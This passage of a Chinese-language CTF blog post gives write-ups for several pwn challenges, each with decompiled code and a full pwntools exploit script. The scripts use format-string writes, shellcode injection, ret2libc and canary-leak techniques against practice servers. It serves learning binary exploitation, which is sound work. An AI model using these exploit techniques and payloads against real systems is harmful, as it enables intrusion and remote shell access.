class="line">  <span class="built_in">puts</span>(<span class="string">&quot;RPG game, but I have changed it! you have no weapon and &quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;skill! you could not defeat me !&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;That&#x27;s sound terrible! you meet final boss!but you level is ONE!&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span> ( *a1 == a1[<span class="number">1</span>] )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Wizard: I will help you! USE YOU SPELL&quot;</span>);</span><br><span class="line">    v1 = mmap(<span class="number">0LL</span>, <span class="number">0x1000</span>uLL, <span class="number">7</span>, <span class="number">0x21</span>, <span class="number">0xFFFFFFFF</span>, <span class="number">0LL</span>);</span><br><span class="line">    read(<span class="number">0</span>, v1, <span class="number">0x100</span>uLL);</span><br><span class="line">    ((<span class="keyword">void</span> (__fastcall *)(_QWORD, <span class="keyword">void</span> *))v1)(<span class="number">0LL</span>, v1);<span class="comment">//这个地方好像是把数转化成程序，然后可以在这里写入shellcode 感觉spell是在提示shell，</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>其中V1为那个地方可以写入shellcode，思路出来了，先使程序运行到printf(&amp;format,&amp;format)这个地方，然后再运行到read v1这，<br>第一个输入点_isoc99_scanf((__int64)”%s”, (__int64)&amp;s);这里随便输什么(不太长)，然后到第二个输入点_isoc99_scanf((__int64)”%s”, (__int64)&amp;s1);这里只能输east，下一个输入点_isoc99_scanf((__int64)”%d”, (__int64)&amp;v1);输入1后即能到上面说的printf(&amp;format,&amp;format),然后程序继续运行当运行到这时要注意了</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 __fastcall <span class="title">sub_400CA6</span><span class="params">(_DWORD *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">void</span> *v1; <span class="comment">// rsi</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v3; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v3 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Ahu!!!!!!!!!!!!!!!!A Dragon has appeared!!&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Dragon say: HaHa! you were supposed to have a normal&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;RPG game, but I have changed it! you have no weapon and &quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;skill! you could not defeat me !&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;That&#x27;s sound terrible! you meet final boss!but you level is ONE!&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span> ( *a1 == a1[<span class="number">1</span>] )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Wizard: I will help you! USE YOU SPELL&quot;</span>);</span><br><span class="line">    v1 = mmap(<span class="number">0LL</span>, <span class="number">0x1000</span>uLL, <span class="number">7</span>, <span class="number">0x21</span>, <span class="number">0xFFFFFFFF</span>, <span class="number">0LL</span>);</span><br><span class="line">    read(<span class="number">0</span>, v1, <span class="number">0x100</span>uLL);</span><br><span class="line">    ((<span class="keyword">void</span> (__fastcall *)(_QWORD, <span class="keyword">void</span> *))v1)(<span class="number">0LL</span>, v1);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>此时唯一的问题是怎么使* a1==a1[1]，a1的地址=v4的地址也就是printf(“secret[0] is %x\n”, v4, a2);这个地方(输出的地方就是v4的地址)，然后看看a1[1]这个地方，然而并没有什么发现，V4的空间为8bytes，此时可以联想到前面的格式化字符串漏洞，将相同的数据分别写入a1和a1[1]不就可以使他们相等了吗？<br>注意这个地方<br>v3 = malloc(8uLL);<br>  v4 = (__int64)v3;</p>
<ul>
<li>v3 = 0x44=68;<br>v3[1] = 0x55=85;<br>v3[0]=v4[0]=a1[0]=68<br>v3[1]=v4[1]=85<br>这个地方先为v3分配8bytes的空间，然后将v3的地址给v4,然后<br>而格式化字符串漏洞怎么实现这个操作？<br>首先肯定要知道v4的地址即printf(“secret[0] is %x\n”, v4, a2);这里的输出内容<br>方法如下p.recvuntil(“secret[0] is “)<br>通过控制输入可以知道偏移量为7,将v4[0]改为85即可能实现相关操作</li>
</ul>
<p>最终exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p=remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">57236</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;secret[0] is &quot;</span>)</span><br><span class="line">v4_addr=(<span class="built_in">int</span>)(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>],<span class="number">16</span>)</span><br><span class="line">p.sendline(<span class="string">&quot;archer&quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;east&#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;&#x27;Give me an address&#x27;&quot;</span>,<span class="built_in">str</span>(v4_addr))</span><br><span class="line">payload=<span class="string">b&#x27;%85c%7$n&#x27;</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">shellcode=asm(shellcraft.sh())</span><br><span class="line">p.sendlineafter(<span class="string">&quot;SPELL&quot;</span>,shellcode)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="第8题guess-num"><a href="#第8题guess-num" class="headerlink" title="第8题guess_num"></a>第8题guess_num</h3><p>程序中最关键的两行代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gets((__int64)&amp;v7);</span><br><span class="line">srand(seed[<span class="number">0</span>]);</span><br></pre></td></tr></table></figure>
<p>send[0]的位置为-10h – -9h v7为-30 – +10 通过gets可以覆盖seed[0]<br>覆盖将seed[0]赋为aaaa后，在Linux上写一个同样的c生成随机数，并且用种子生成的随机数使伪随机数在相同系统下用相同种子生成的随机数相同，然后根据题目要求要依次输入10个数且==rand()%6+1,直接在Linux上写个c脚本然后依次输就能得到flag</p>
<p>第9题cgpwn2</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;please tell me your name&quot;</span>);</span><br><span class="line">fgets(name, <span class="number">50</span>, <span class="built_in">stdin</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;hello,you can leave some message here:&quot;</span>);</span><br><span class="line"><span class="keyword">return</span> gets(&amp;s);</span><br></pre></td></tr></table></figure>
<p>代码中未给出/bin/sh或者cat flag之类的语句，同时也没有相关的可执行函数，因此需要调用system然后再把/bin/sh填入fgets中，最后/bin/sh填入system函数的参数中<br>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">56145</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;name\n&quot;</span>,<span class="string">&#x27;/bin/sh&#x27;</span>)</span><br><span class="line">systemaddr=<span class="number">0x08048420</span></span><br><span class="line">nameaddr=<span class="number">0x0804A080</span></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x2A</span>+p32(systemaddr)+p32(<span class="number">0</span>)+p32(nameaddr)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;here:\n&quot;</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="第10题level3"><a href="#第10题level3" class="headerlink" title="第10题level3"></a>第10题level3</h3><p>做题思路：程序中无system函数，但给出了libc文件，可以通过调用libc中的system和/bin/sh得到flag，调用system需要system函数的真实地址，一开始思路是直接栈溢出到system函数，但是system中的参数地址肯定要是/bin/sh，但/bin/sh不在plt表里，此时问题变成了怎么得到/bin/sh的地址，/bin/sh的地址可以通过strings -a -t x libc_32.so.6 | grep “/bin/sh”得到为0x15902b,但是这个地址是假的地址，再加上got的基地址就是对应真实地址，因此问题变成了怎么得到got的基地址，got的基地址可以通过write函数的got值和libc.sys中的值得出=write_got-libc.sym[‘write’]<br>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">48579</span>)</span><br><span class="line">elf=ELF(<span class="string">&quot;./level3&quot;</span>)</span><br><span class="line">libc=ELF(<span class="string">&quot;./libc_32.so.6&quot;</span>)</span><br><span class="line">write_plt=elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">write_got=elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">main_addr=libc.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x8c</span>+p32(write_plt)+p32(main_addr)+p32(<span class="number">1</span>)+p32(write_got)+p32(<span class="number">4</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;Input:\n&#x27;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">write_got_addr=u32(p.recv(<span class="number">4</span>))</span><br><span class="line">base=write_got_addr-libc.sym[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">system_addr=base+libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh_addr=base+<span class="number">0x15902b</span></span><br><span class="line">payload1=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x8C</span>+p32(system_addr)+p32(<span class="number">0</span>)+p32(binsh_addr)</span><br><span class="line">p.sendline(payload1)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="进阶区第1题dice-game"><a href="#进阶区第1题dice-game" class="headerlink" title="进阶区第1题dice_game"></a>进阶区第1题dice_game</h3><p>本题考查的知识点是如果随机数的种子相同，则对应的随机数也相通，思路通过栈溢出覆盖seed[0]<br>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">51064</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x40</span>+<span class="string">b&#x27;aaaa&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&quot;your name: &quot;</span>,payload)</span><br><span class="line">libc=cdll.LoadLibrary(<span class="string">&quot;libc.so.6&quot;</span>)</span><br><span class="line">libc.srand(<span class="number">0x61616161</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">50</span>):</span><br><span class="line">    num=libc.rand()%<span class="number">6</span>+<span class="number">1</span></span><br><span class="line">    p.sendlineafter(<span class="string">&quot;point(1~6): &quot;</span>,<span class="built_in">str</span>(num))</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br></pre></td></tr></table></figure>

<h3 id="第2题forgot"><a href="#第2题forgot" class="headerlink" title="第2题forgot"></a>第2题forgot</h3><p>本题考察的知识点是栈溢出，程序看上去十分复杂，但只要理清程序的流程就十分容易<br>第一个点是__isoc99_scanf(“%s”, v2);这里存在栈溢出，第二个点是(* (&amp;v3 + –v14))();这个是一个函数<br>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&quot;./forgot&quot;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;name?&quot;</span>,<span class="string">&#x27;archer&#x27;</span>)</span><br><span class="line">payload=<span class="string">b&#x27;A&#x27;</span>*<span class="number">32</span>+p32(<span class="number">0x80486CC</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="第3题Mary-Morton"><a href="#第3题Mary-Morton" class="headerlink" title="第3题Mary_Morton"></a>第3题Mary_Morton</h3><p>64位，开了canary和NX存在system函数可以直接得到flag,flag_addr=0x4008DA<br>第一种方法利用格式化字符串漏洞绕canary然后劫持ret到system<br>exp如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">p&#x3D;remote(&#39;111.200.241.244&#39;,57770)</span><br><span class="line">p.sendlineafter(&#39;3. Exit the battle &#39;,&#39;2&#39;)#输入2进入的函数存在格式化字符串漏洞</span><br><span class="line">p.sendline(&#39;%23$p&#39;)#23可以通过字符串格式化漏洞得出</span><br><span class="line">p.recvuntil(&#39;0x&#39;)</span><br><span class="line">cookie&#x3D;int(p.recv(16),16)</span><br><span class="line">flag_addr&#x3D;0x4008DA</span><br><span class="line">payload&#x3D;b&#39;a&#39;*0x88+p64(cookie)+b&#39;a&#39;*8+p64(flag_addr)</span><br><span class="line">p.sendlineafter(&#39;3. Exit the battle &#39;,&#39;1&#39;)#输入1进入的函数存在栈溢出</span><br><span class="line">p.sendline(payload)</span><br><span class="line">print(p.recvline())</span><br><span class="line">print(p.recvline())</span><br></pre></td></tr></table></figure>
<p>第2种方法通过利用check_stack_fail以及格式化字符串漏洞来改got表</p>
<h3 id="第3题pwn-100"><a href="#第3题pwn-100" class="headerlink" title="第3题pwn-100"></a>第3题pwn-100</h3><p>先checksec，程序只开了NX，程序中存在栈溢出，程序中无system函数，无libc，无/bin/sh，当有read，puts函数，因此大概思路有了<br>1.泄露system函数地址<br>2.构造rop链，写入”/bin/sh”<br>3.调用system()函数<br>泄露system有几种方式，第一种是通过DynELF模块</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/WP/" rel="tag"># WP</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/03/04/pwn%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="next" title="pwn学习笔记">
                <i class="fa fa-chevron-left"></i> pwn学习笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/04/07/buupwnWP/" rel="prev" title="buupwn wp">
                buupwn wp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.gif"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">26</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xiquanmuhua.github.io/" title="muhua" target="_blank">muhua</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://tianmai1.github.io/" title="tianmai" target="_blank">tianmai</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://makabaka-yyds.github.io/" title="makabaka" target="_blank">makabaka</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://lucifer-rossweisse.github.io/" title="Rossweisse" target="_blank">Rossweisse</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://lemonprefect.cn/" title="lemon" target="_blank">lemon</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B0%E6%89%8B%E5%8C%BA1-level0"><span class="nav-number">1.</span> <span class="nav-text">新手区1.level0</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B0%E6%89%8B%E5%8C%BA%E7%AC%AC2%E9%A2%98hello-pwn-%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="nav-number">2.</span> <span class="nav-text">新手区第2题hello pwn(栈溢出)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC3%E9%A2%98int-overflow-%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA-%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="nav-number">3.</span> <span class="nav-text">第3题int_overflow(整数溢出+栈溢出)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC4%E9%A2%98when-did-you-born-%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="nav-number">4.</span> <span class="nav-text">第4题when_did_you_born(栈溢出)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC5%E9%A2%98CGfsb-%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E"><span class="nav-number">5.</span> <span class="nav-text">第5题CGfsb(格式化字符串漏洞)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC6%E9%A2%98level2"><span class="nav-number">6.</span> <span class="nav-text">第6题level2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC7%E9%A2%98string"><span class="nav-number">7.</span> <span class="nav-text">第7题string</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC8%E9%A2%98guess-num"><span class="nav-number">8.</span> <span class="nav-text">第8题guess_num</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC10%E9%A2%98level3"><span class="nav-number">9.</span> <span class="nav-text">第10题level3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%9B%E9%98%B6%E5%8C%BA%E7%AC%AC1%E9%A2%98dice-game"><span class="nav-number">10.</span> <span class="nav-text">进阶区第1题dice_game</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC2%E9%A2%98forgot"><span class="nav-number">11.</span> <span class="nav-text">第2题forgot</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC3%E9%A2%98Mary-Morton"><span class="nav-number">12.</span> <span class="nav-text">第3题Mary_Morton</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC3%E9%A2%98pwn-100"><span class="nav-number">13.</span> <span class="nav-text">第3题pwn-100</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Archer</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>



<div class="theme-info">
  Theme -
  <a class="theme-link" rel="external nofollow noopener" target="_blank" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Gemini
  </a>
**  <span id="busuanzi_container_site_pv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站总访问量<span id="busuanzi_value_site_pv"></span>次
  </span>
  <span id="busuanzi_container_site_uv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站访客数<span id="busuanzi_value_site_uv"></span>人次
  </span>
**
</div>
        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("LbPELecNVT4mCuCTYHSU2wzm-gzGzoHsz", "iRokzKJjxE22Vs6iknD1dqGA");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
